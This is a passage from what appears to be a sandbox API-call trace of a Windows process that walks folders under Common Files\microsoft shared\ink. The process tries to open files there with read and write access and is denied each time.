[0099.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0099.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0099.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0099.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f848 [0099.187] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0099.187] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a958 [0099.187] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0099.187] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.187] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.187] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.187] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.187] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0099.187] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.187] AreFileApisANSI () returned 1 [0099.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions", lpUsedDefaultChar=0x0) returned 65 [0099.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0099.187] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.187] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0099.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.187] AreFileApisANSI () returned 1 [0099.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0099.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82c28 [0099.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x82c28, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions") returned 65 [0099.187] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.188] GetLastError () returned 0x5 [0099.188] GetLastError () returned 0x5 [0099.188] SetLastError (dwErrCode=0x5) [0099.188] GetLastError () returned 0x5 [0099.188] SetLastError (dwErrCode=0x5) [0099.188] GetLastError () returned 0x5 [0099.188] SetLastError (dwErrCode=0x5) [0099.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82c28 | out: hHeap=0x20000) returned 1 [0099.188] AreFileApisANSI () returned 1 [0099.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0099.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82298 [0099.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x82298, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions") returned 65 [0099.188] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.188] GetLastError () returned 0x5 [0099.188] GetLastError () returned 0x5 [0099.188] SetLastError (dwErrCode=0x5) [0099.188] GetLastError () returned 0x5 [0099.188] SetLastError (dwErrCode=0x5) [0099.188] GetLastError () returned 0x5 [0099.188] SetLastError (dwErrCode=0x5) [0099.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82298 | out: hHeap=0x20000) returned 1 [0099.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0099.188] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.188] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.188] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.188] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fe78 [0099.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0099.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0099.189] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf9a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="he-IL", cAlternateFileName="")) returned 1 [0099.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0099.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0099.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0099.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0099.189] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78690 [0099.189] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0637839, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.189] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0638633, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="auxpad", cAlternateFileName="")) returned 1 [0099.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0099.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0099.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46908 [0099.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0099.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0099.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0099.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0099.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0099.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aa88 [0099.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0099.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0099.189] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.189] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.190] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.190] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0099.190] AreFileApisANSI () returned 1 [0099.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad", lpUsedDefaultChar=0x0) returned 72 [0099.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0099.190] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.190] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0099.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.190] AreFileApisANSI () returned 1 [0099.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0099.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0099.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad") returned 72 [0099.190] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.190] GetLastError () returned 0x5 [0099.190] GetLastError () returned 0x5 [0099.190] SetLastError (dwErrCode=0x5) [0099.190] GetLastError () returned 0x5 [0099.190] SetLastError (dwErrCode=0x5) [0099.190] GetLastError () returned 0x5 [0099.190] SetLastError (dwErrCode=0x5) [0099.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0099.190] AreFileApisANSI () returned 1 [0099.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0099.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0099.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad") returned 72 [0099.191] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.191] GetLastError () returned 0x5 [0099.191] GetLastError () returned 0x5 [0099.191] SetLastError (dwErrCode=0x5) [0099.191] GetLastError () returned 0x5 [0099.191] SetLastError (dwErrCode=0x5) [0099.191] GetLastError () returned 0x5 [0099.191] SetLastError (dwErrCode=0x5) [0099.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0099.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0099.191] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.191] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.191] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.191] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0099.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0099.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0099.191] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="auxpad.xml", cAlternateFileName="")) returned 1 [0099.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0099.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0099.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0099.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0099.192] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78290 [0099.192] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0638633, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.192] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x59a, dwReserved0=0x0, dwReserved1=0x0, cFileName="auxbase.xml", cAlternateFileName="")) returned 1 [0099.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0099.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46518 [0099.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0099.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0099.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0099.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0099.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0099.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81638 [0099.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81638 | out: hHeap=0x20000) returned 1 [0099.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.193] AreFileApisANSI () returned 1 [0099.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpUsedDefaultChar=0x0) returned 84 [0099.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0099.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.193] AreFileApisANSI () returned 1 [0099.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0099.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x5f9a8 [0099.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x5f9a8, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 84 [0099.193] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft 